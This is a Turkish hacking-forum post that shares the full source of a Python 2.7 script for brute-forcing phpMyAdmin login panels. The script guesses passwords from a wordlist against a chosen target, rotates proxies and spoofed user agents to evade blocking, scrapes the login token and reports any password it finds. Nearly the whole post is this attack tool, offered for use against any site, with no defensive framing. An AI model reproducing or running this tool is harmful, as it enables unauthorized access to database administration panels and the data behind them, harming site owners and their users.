⌘K
Duyuru
Duyurular

Exploit [BRUTEFORCE] PhpMyAdmin Python exploit

SpyAdmin 

Sizlere Python2.7 ile yazılmış bir script sunuyorum. çalışmasının PhpMyAdmin paneline Brute Force saldırısıyla meşgul olduğu herhangi bir sürüm, ihtiyacınız olan tek şey...


Sizlere Python2.7 ile yazılmış bir script sunuyorum.
çalışmasının PhpMyAdmin paneline Brute Force saldırısıyla meşgul olduğu
herhangi bir sürüm,
ihtiyacınız olan tek şey tercüman sürüm 2.7.9 + bir hedef + kelime listesi

işte betiğin kaynak kodu

Python: 
#!/usr/bin/python2.7

from re import search as re_search
from re import findall as re_find
from urllib import urlencode
from cookielib import CookieJar
import threading,random
import urllib2,Queue
import signal,sys,os

if len(sys.argv) != 9:
    print "\n[+] PhpMyAdmin Bruteforcer"
    print "[+] Coded By Bl1nd_Cr0w"
    print "[+] Usage: ./"+os.path.basename(__file__)+" -t [target] -u [user] -w [wordlist] -p [proxies]\n"
    sys.exit(0)

for arg in sys.argv[1:]:
    if arg.lower() == '-t':
        site = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-u':
        username = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-w':
        wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-p':
        prxies = sys.argv[int(sys.argv[1:].index(arg))+2]

try:
    passwords = open(wordlist,"r").readlines()
except(IOError):
    sys.exit("\n\n[-] Error :: passwords file not found !\n\n")

try:
    proxies = open(prxies,"r").readlines()
except(IOError):
    sys.exit("\n\n[-] Error :: proxies file not found !\n\n")

if "http://" in site or "https://" in site:
        path = site + '/phpmyadmin/'
else:
        path = "http://" + site + "/phpmyadmin"

q = Queue.Queue()
user_agents = ["Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10","Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4","Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.3 Safari/532.2","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0","Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5","Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10","Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14","Mozilla/5.0 (X11; U; Windows NT 6; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.587.0 Safari/534.12","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13","Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20","Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1","Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7","Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19","Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24","Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1","Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36","Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36","Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36","Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36","Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5","Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2","Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080214 Firefox/2.0.0.12","Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8","Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.5) Gecko/20060819 Firefox/1.5.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.0; es-ES; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3","Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; Windows NT 6.1; rv:2.0b2) Gecko/20100720 Firefox/4.0b2","Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100308 Ubuntu/10.04 (lucid) Firefox/3.6 GTB7.1","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre","Mozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre","Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2","Mozilla/5.0 (X11; Linux i686 on x86_64; rv:12.0) Gecko/20100101 Firefox/12.0","Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2","Mozilla/5.0 (X11; Ubuntu; Linux armv7l; rv:17.0) Gecko/20100101 Firefox/17.0","Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0","Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:25.0) Gecko/20100101 Firefox/25.0","Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0","Mozilla/5.0 (X11; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0","Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"]

for pwd in passwords:
    q.put(pwd.replace('\r','').replace('\n',''))

def interrupt(signum=0,frame=0):
    print "\n\n[+] Interruption :: operation aborted !\n\n"
    os.kill(os.getpid(),9)

class Attack(threading.Thread):

    reqs = 0

    def run(self):
        while not q.empty():
            passwd = q.get()
            proxy = random.choice(proxies)
            try:
                self.reqs += 1
                cj = CookieJar()
                opener = urllib2.build_opener(
                    urllib2.HTTPCookieProcessor(cj),
                    urllib2.ProxyHandler({"http":"http://"+proxy})
                    )
                opener.addheaders = [("User-Agent",random.choice(user_agents))]
                source = opener.open(path).read()
                token = re_search("name=\"token\" value=\"(.*?)\"",source)
                if token:
                    post_data = urlencode({"pma_username":username, "pma_password":passwd, "server":1, "target":"/index.php", "token":token})
                    login = opener.open(path,post_data).read()
                    if re_find("server_databases.php",login):
                        print "\n\n[+] Password found: %s" % passwd
                        os.kill(os.getpid(),9)
                    else:
                        sys.stdout.write("\r[!] Scanning passwords: (%d/%d) " % (self.reqs,len(passwords)))
                        sys.stdout.flush()
            except(urllib2.HTTPError) as erro:
                print "\n[-] Error :: ",erro
                os.kill(os.getpid(),9)

print "\n[+] PhpMyAdmin Bruteforcer"
print "[+] Coded By Bl1nd_Cr0w"
print "[+] Target: %s" % site
print "[+] Username: %s" % username
print "[+] Passwords: %d" % len(passwords)
print "[+] Proxies: %d\n" % len(proxies)

signal.signal(signal.SIGINT,interrupt)
if __name__ == '__main__':
    Reaper = Attack()
    Reaper.start()
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Yanıt için giriş yapmanız veya üye olmanız gerekir.
132,544Konular
3,282,139Mesajlar
317,730Kullanıcılar
ROKSY0Son Üye

About Us & Legal Notice

Yasal Uyarı: spyhackerz.org, 5651 sayılı Kanun kapsamında “Yer Sağlayıcı”dır. Sitedeki içerikler, X, Instagram ve Facebook’ta olduğu gibi, ön onay olmadan tamamen kullanıcılar tarafından paylaşılır. Bu nedenle spyhackerz.org, kullanıcı içeriklerini veya hukuka aykırı paylaşımları izlemek, denetlemek ve araştırmakla yükümlü değildir. Site bünyesinde herhangi bir “saldırı ekibi” bulunmamaktadır ve Türkiye’deki internet sitelerine yönelik zararlı faaliyet yürütülmez. SPYHACKERZ, üyelerin bireysel olarak gerçekleştirdiği hacking içerikli forum faaliyetlerinden sorumlu değildir. spyhackerz.org adı kullanılarak bir saldırı yapılması halinde tüm sorumluluk yalnızca ilgili üyeye aittir.
Üst Alt